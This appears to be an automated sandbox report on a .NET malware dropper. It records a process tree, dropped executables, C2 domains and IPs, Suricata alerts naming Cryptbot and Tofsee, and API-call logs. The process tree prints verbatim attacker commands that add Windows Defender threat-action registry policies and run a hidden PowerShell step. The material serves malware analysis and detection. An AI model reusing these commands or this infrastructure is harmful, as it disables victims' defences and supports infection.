Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Aug. 17, 2024, 10:11 p.m.	Aug. 17, 2024, 10:14 p.m.

Size	10.5KB
Type	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5	`a107fbd4b2549ebb3babb91cd462cec8`
SHA256	`5a9b441d59e7ac7e3bdc74a11ed13150aecbf061b3e6611e2e10d11cd232c5d2`
CRC32	`D7DEC0B2`
ssdeep	`192:Bxb+zdkacI2v0Hn7bEbIn+qeDIcugX8PAJ8stYcFwVc03KY:Xb++oH7bEbIn+0gX8YJptYcFwVc03K`
Yara	Malicious_Library_Zero - Malicious_Library PE_Header_Zero - PE File Signature Is_DotNET_EXE - (no description) IsPE32 - (no description) UPX_Zero - UPX packed file

file1.exe "C:\Users\test22\AppData\Local\Temp\file1.exe"
1880
- acFYONjqGQhfMgmKNG1gZnmY.exe "C:\Users\test22\Pictures\acFYONjqGQhfMgmKNG1gZnmY.exe"
  2624
- vgdyfc1VcBsqmc2SsNuc62Y1.exe "C:\Users\test22\Pictures\vgdyfc1VcBsqmc2SsNuc62Y1.exe"
  2640
  - cmd.exe cmd /c ""C:\Users\test22\AppData\Local\Temp\RarSFX0\keygen.bat" "
    3024
    - control.exe "C:\Windows\System32\control.exe" "C:\Users\test22\AppData\Local\Temp\RarSFX0\keygen-step-2.cpl",
      3056
      - rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\test22\AppData\Local\Temp\RarSFX0\keygen-step-2.cpl",
        744
        
        rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\test22\AppData\Local\Temp\RarSFX0\keygen-step-2.cpl",
        2164
- z7sqTTpo7jhmcMDp0blbc6Qe.exe "C:\Users\test22\Pictures\z7sqTTpo7jhmcMDp0blbc6Qe.exe"
  2632
- bY1WXV8eleObWNCtpR7Kl9vV.exe "C:\Users\test22\Pictures\bY1WXV8eleObWNCtpR7Kl9vV.exe"
  2776
  - Install.exe .\Install.exe
    2872
    - Install.exe .\Install.exe /wGdidJaD "385104" /S
      2924
      - cmd.exe "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        3000
        
        forfiles.exe forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
        412
        
        cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        1752
        
        reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        1984
        
        forfiles.exe forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
        2448
        
        cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        2124
        
        reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        2512
        
        forfiles.exe forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
        2720
        
        cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        2828
        
        reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        2944
        
        forfiles.exe forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
        3040
        
        cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        1716
        
        reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        184
        
        forfiles.exe forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        2344
        
        cmd.exe /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        2684
        
        powershell.exe powershell start-process -WindowStyle Hidden gpupdate.exe /force
        1596
        
        gpupdate.exe "C:\Windows\system32\gpupdate.exe" /force
        2128
explorer.exe C:\Windows\Explorer.EXE
1236

Name	Response	Post-Analysis Lookup
58yongzhe.com	A 62.133.62.93	62.133.62.93
yip.su	A 104.21.79.77 A 172.67.169.89	104.21.79.77
pastebin.com	A 172.67.19.24 A 104.20.4.235 A 104.20.3.235	172.67.19.24
cdn.discordapp.com	A 162.159.135.233 A 162.159.134.233 A 162.159.129.233 A 162.159.130.233 A 162.159.133.233	162.159.133.233
tvezx20pt.top	A 77.232.42.234	77.232.42.234

IP Address	Status	Action
104.21.79.77	Active	Moloch
162.159.135.233	Active	Moloch
164.124.101.2	Active	Moloch
172.67.19.24	Active	Moloch
194.58.114.223	Active	Moloch
62.133.62.93	Active	Moloch
77.232.42.234	Active	Moloch
91.121.59.207	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
UDP 192.168.56.103:53673 -> 164.124.101.2:53	2035466	ET INFO Observed Discord Domain in DNS Lookup (discordapp .com)	Misc activity
UDP 192.168.56.103:50800 -> 164.124.101.2:53	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	Potentially Bad Traffic
TCP 192.168.56.103:49163 -> 172.67.19.24:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49164 -> 104.21.79.77:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49166 -> 172.67.19.24:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49169 -> 104.21.79.77:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49170 -> 91.121.59.207:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49167 -> 91.121.59.207:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 91.121.59.207:80 -> 192.168.56.103:49167	2014819	ET INFO Packed Executable Download	Misc activity
TCP 91.121.59.207:80 -> 192.168.56.103:49170	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 91.121.59.207:80 -> 192.168.56.103:49170	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 91.121.59.207:80 -> 192.168.56.103:49170	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 91.121.59.207:80 -> 192.168.56.103:49167	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 91.121.59.207:80 -> 192.168.56.103:49167	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 91.121.59.207:80 -> 192.168.56.103:49167	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49172 -> 162.159.135.233:443	2035464	ET INFO Observed Discord Domain (discordapp .com in TLS SNI)	Misc activity
TCP 192.168.56.103:49172 -> 162.159.135.233:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 62.133.62.93:80 -> 192.168.56.103:49171	2014819	ET INFO Packed Executable Download	Misc activity
TCP 62.133.62.93:80 -> 192.168.56.103:49171	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 62.133.62.93:80 -> 192.168.56.103:49171	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
UDP 192.168.56.103:62576 -> 164.124.101.2:53	2023883	ET DNS Query to a *.top domain - Likely Hostile	Potentially Bad Traffic
TCP 192.168.56.103:49202 -> 77.232.42.234:80	2023882	ET INFO HTTP Request to a *.top domain	Potentially Bad Traffic
TCP 192.168.56.103:49202 -> 77.232.42.234:80	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	A Network Trojan was detected
TCP 192.168.56.103:49207 -> 77.232.42.234:80	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	A Network Trojan was detected
TCP 192.168.56.103:49180 -> 77.232.42.234:80	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	A Network Trojan was detected
TCP 194.58.114.223:80 -> 192.168.56.103:49168	2049228	ET HUNTING Redirect to Discord Attachment Download	Misc activity

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLS 1.2 192.168.56.103:49163 172.67.19.24:443	C=US, O=Google Trust Services, CN=WE1	CN=pastebin.com	e3:4a:2e:16:cc:2b:72:f6:c5:22:3e:52:49:b3:50:2a:1b:85:6f:8b
TLS 1.2 192.168.56.103:49164 104.21.79.77:443	C=US, O=Google Trust Services, CN=WE1	CN=yip.su	54:c6:bc:0e:e6:b0:fd:78:5e:b0:5a:18:c6:42:6a:44:fc:cc:b3:ca
TLS 1.2 192.168.56.103:49166 172.67.19.24:443	None	None	None
TLS 1.2 192.168.56.103:49169 104.21.79.77:443	C=US, O=Google Trust Services, CN=WE1	CN=yip.su	54:c6:bc:0e:e6:b0:fd:78:5e:b0:5a:18:c6:42:6a:44:fc:cc:b3:ca
TLS 1.2 192.168.56.103:49172 162.159.135.233:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=discordapp.com	97:8b:ee:ad:1e:bf:a1:69:e7:94:29:f7:55:7a:29:64:19:c7:81:39

Queries for the computername (9 events)

Time & API	Arguments	Status	Return
GetComputerNameW Aug. 17, 2024, 10:12 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 17, 2024, 10:12 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 17, 2024, 10:12 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 17, 2024, 10:12 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 17, 2024, 10:12 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 17, 2024, 10:12 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 17, 2024, 10:12 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Aug. 17, 2024, 10:12 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 17, 2024, 10:12 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (6 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Aug. 17, 2024, 10:04 p.m.			0	0
IsDebuggerPresent Aug. 17, 2024, 10:04 p.m.			0	0
IsDebuggerPresent Aug. 17, 2024, 10:12 p.m.			0	0
IsDebuggerPresent Aug. 17, 2024, 10:12 p.m.			0	0
IsDebuggerPresent Aug. 17, 2024, 10:12 p.m.			0	0
IsDebuggerPresent Aug. 17, 2024, 10:12 p.m.			0	0

Command line console output was observed (50 out of 102 events)

Time & API	Arguments	Status	Return
WriteConsoleW Aug. 17, 2024, 10:12 p.m.	buffer: The operation completed successfully. console_handle: 0x00000007	1	1
WriteConsoleW Aug. 17, 2024, 10:12 p.m.	buffer: The operation completed successfully. console_handle: 0x00000007	1	1
WriteConsoleW Aug. 17, 2024, 10:12 p.m.	buffer: The operation completed successfully. console_handle: 0x00000007	1	1
WriteConsoleW Aug. 17, 2024, 10:12 p.m.	buffer: The operation completed successfully. console_handle: 0x00000007	1	1
WriteConsoleA Aug. 17, 2024, 10:12 p.m.	buffer: U console_handle: 0x00000007	1	1
WriteConsoleA Aug. 17, 2024, 10:12 p.m.	buffer: p console_handle: 0x00000007	1	1
WriteConsoleA Aug. 17, 2024, 10:12 p.m.	buffer: d console_handle: 0x00000007	1	1
WriteConsoleA Aug. 17, 2024, 10:12 p.m.	buffer: a console_handle: 0x00000007	1	1
WriteConsoleA Aug. 17, 2024, 10:12 p.m.	buffer: t console_handle: 0x00000007	1	1
WriteConsoleA Aug. 17, 2024, 10:12 p.m.	buffer: i console_handle: 0x00000007	1	1
WriteConsoleA Aug. 17, 2024, 10:12 p.m.	buffer: n console_handle: 0x00000007	1	1
WriteConsoleA Aug. 17, 2024, 10:12 p.m.	buffer: g console_handle: 0x00000007	1	1
WriteConsoleA Aug. 17, 2024, 10:12 p.m.	buffer: P console_handle: 0x00000007	1	1
WriteConsoleA Aug. 17, 2024, 10:12 p.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA Aug. 17, 2024, 10:12 p.m.	buffer: l console_handle: 0x00000007	1	1
WriteConsoleA Aug. 17, 2024, 10:12 p.m.	buffer: i console_handle: 0x00000007	1	1
WriteConsoleA Aug. 17, 2024, 10:12 p.m.	buffer: c console_handle: 0x00000007	1	1
WriteConsoleA Aug. 17, 2024, 10:12 p.m.	buffer: y console_handle: 0x00000007	1	1
WriteConsoleA Aug. 17, 2024, 10:12 p.m.	buffer: U console_handle: 0x00000007	1	1
WriteConsoleA Aug. 17, 2024, 10:12 p.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA Aug. 17, 2024, 10:12 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Aug. 17, 2024, 10:12 p.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA Aug. 17, 2024, 10:12 p.m.	buffer: P console_handle: 0x00000007	1	1
WriteConsoleA Aug. 17, 2024, 10:12 p.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA Aug. 17, 2024, 10:12 p.m.	buffer: l console_handle: 0x00000007	1	1
WriteConsoleA Aug. 17, 2024, 10:12 p.m.	buffer: i console_handle: 0x00000007	1	1
WriteConsoleA Aug. 17, 2024, 10:12 p.m.	buffer: c console_handle: 0x00000007	1	1
WriteConsoleA Aug. 17, 2024, 10:12 p.m.	buffer: y console_handle: 0x00000007	1	1
WriteConsoleA Aug. 17, 2024, 10:12 p.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA Aug. 17, 2024, 10:12 p.m.	buffer: p console_handle: 0x00000007	1	1
WriteConsoleA Aug. 17, 2024, 10:12 p.m.	buffer: d console_handle: 0x00000007	1	1
WriteConsoleA Aug. 17, 2024, 10:12 p.m.	buffer: a console_handle: 0x00000007	1	1
WriteConsoleA Aug. 17, 2024, 10:12 p.m.	buffer: t console_handle: 0x00000007	1	1
WriteConsoleA Aug. 17, 2024, 10:12 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Aug. 17, 2024, 10:12 p.m.	buffer: h console_handle: 0x00000007	1	1
WriteConsoleA Aug. 17, 2024, 10:12 p.m.	buffer: a console_handle: 0x00000007	1	1
WriteConsoleA Aug. 17, 2024, 10:12 p.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA Aug. 17, 2024, 10:12 p.m.	buffer: c console_handle: 0x00000007	1	1
WriteConsoleA Aug. 17, 2024, 10:12 p.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA Aug. 17, 2024, 10:12 p.m.	buffer: m console_handle: 0x00000007	1	1
WriteConsoleA Aug. 17, 2024, 10:12 p.m.	buffer: p console_handle: 0x00000007	1	1
WriteConsoleA Aug. 17, 2024, 10:12 p.m.	buffer: l console_handle: 0x00000007	1	1
WriteConsoleA Aug. 17, 2024, 10:12 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Aug. 17, 2024, 10:12 p.m.	buffer: t console_handle: 0x00000007	1	1
WriteConsoleA Aug. 17, 2024, 10:12 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Aug. 17, 2024, 10:12 p.m.	buffer: d console_handle: 0x00000007	1	1
WriteConsoleA Aug. 17, 2024, 10:12 p.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA Aug. 17, 2024, 10:12 p.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA Aug. 17, 2024, 10:12 p.m.	buffer: c console_handle: 0x00000007	1	1
WriteConsoleA Aug. 17, 2024, 10:12 p.m.	buffer: c console_handle: 0x00000007	1	1

Uses Windows APIs to generate a cryptographic key (40 events)

Time & API	Arguments	Status	Return
CryptExportKey Aug. 17, 2024, 10:12 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d8820 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 17, 2024, 10:12 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d8960 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 17, 2024, 10:12 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d8960 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 17, 2024, 10:12 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d8960 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 17, 2024, 10:12 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d8160 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 17, 2024, 10:12 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d8160 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 17, 2024, 10:12 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d8160 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 17, 2024, 10:12 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d8160 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 17, 2024, 10:12 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d8160 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 17, 2024, 10:12 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d8160 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 17, 2024, 10:12 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d8960 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 17, 2024, 10:12 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d8960 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 17, 2024, 10:12 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d8960 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 17, 2024, 10:12 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d8ee0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 17, 2024, 10:12 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d8ee0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 17, 2024, 10:12 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d8ee0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 17, 2024, 10:12 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d8be0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 17, 2024, 10:12 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d8ee0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 17, 2024, 10:12 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d8ee0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 17, 2024, 10:12 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d8ee0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 17, 2024, 10:12 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d8ee0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 17, 2024, 10:12 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d8ee0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 17, 2024, 10:12 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d8ee0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 17, 2024, 10:12 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d8ee0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 17, 2024, 10:12 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d8ca0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 17, 2024, 10:12 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d8ca0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 17, 2024, 10:12 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d8ca0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 17, 2024, 10:12 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d8ca0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 17, 2024, 10:12 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d8ca0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 17, 2024, 10:12 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d8ca0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 17, 2024, 10:12 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d8ca0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 17, 2024, 10:12 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d8ca0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 17, 2024, 10:12 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d8ca0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 17, 2024, 10:12 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d8ca0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 17, 2024, 10:12 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d8ca0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 17, 2024, 10:12 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d8ca0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 17, 2024, 10:12 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d8ca0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 17, 2024, 10:12 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d8ca0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 17, 2024, 10:12 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d8d20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 17, 2024, 10:12 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d8d20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Tries to locate where the browsers are installed (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Aug. 17, 2024, 10:04 p.m.		1	1	0

One or more processes crashed (3 events)

Time & API	Arguments	Status
__exception__ Aug. 17, 2024, 10:12 p.m.	stacktrace: memmove+0x1b1 _unlock-0x422 msvcrt+0xa00b @ 0x76b2a00b main+0x30918c acfyonjqgqhfmgmkng1gznmy+0x37d5c8 @ 0x77d5c8 main+0x313f10 acfyonjqgqhfmgmkng1gznmy+0x38834c @ 0x78834c main-0x640ca acfyonjqgqhfmgmkng1gznmy+0x10372 @ 0x410372 main+0x3ac2aa acfyonjqgqhfmgmkng1gznmy+0x4206e6 @ 0x8206e6 main+0x3982c0 acfyonjqgqhfmgmkng1gznmy+0x40c6fc @ 0x80c6fc main+0x2f3231 acfyonjqgqhfmgmkng1gznmy+0x36766d @ 0x76766d main-0x730a6 acfyonjqgqhfmgmkng1gznmy+0x1396 @ 0x401396 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 66 0f 7f 6f 50 66 0f 7f 77 60 66 0f 7f 7f 70 8d exception.symbol: memmove+0x22d _unlock-0x3a6 msvcrt+0xa087 exception.address: 0x76b2a087 exception.module: msvcrt.dll exception.exception_code: 0xc0000005 exception.offset: 41095 registers.esp: 2685360 registers.edi: 18198448 registers.eax: 18158640 registers.ebp: 2685368 registers.edx: 0 registers.ebx: 12159200 registers.esi: 12199008 registers.ecx: 346	1
__exception__ Aug. 17, 2024, 10:12 p.m.	stacktrace: RtlpNtEnumerateSubKey+0x2aeb isupper-0x4d6b ntdll+0xcf619 @ 0x7796f619 RtlpNtEnumerateSubKey+0x2d74 isupper-0x4ae2 ntdll+0xcf8a2 @ 0x7796f8a2 RtlUlonglongByteSwap+0xdacb RtlFreeOemString-0x13e0f ntdll+0x8aebb @ 0x7792aebb RtlImageNtHeader+0xb6a RtlDeleteCriticalSection-0x927 ntdll+0x33cce @ 0x778d3cce malloc+0x57 _finite-0xac msvcrt+0x9d45 @ 0x76b29d45 strcpy_s+0x5f _ismbblead-0x34 msvcrt+0xf5d3 @ 0x76b2f5d3 _ftol2_sse_excpt+0x159e3 __STRINGTOLD-0x97b7 msvcrt+0x4779e @ 0x76b6779e main+0x3f899f acfyonjqgqhfmgmkng1gznmy+0x46cddb @ 0x86cddb RtlKnownExceptionFilter+0xb7 EtwEventWriteNoRegistration-0x49 ntdll+0x721d7 @ 0x779121d7 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 5e 10 8b 46 14 03 c3 3b 45 0c 73 08 3b 45 fc exception.symbol: RtlpNtEnumerateSubKey+0x1ec1 isupper-0x5995 ntdll+0xce9ef exception.instruction: mov ebx, dword ptr [esi + 0x10] exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 846319 exception.address: 0x7796e9ef registers.esp: 2682712 registers.edi: 18153528 registers.eax: 1878234100 registers.ebp: 2682732 registers.edx: 407373464 registers.ebx: 0 registers.esi: 407373456 registers.ecx: 18153472	1
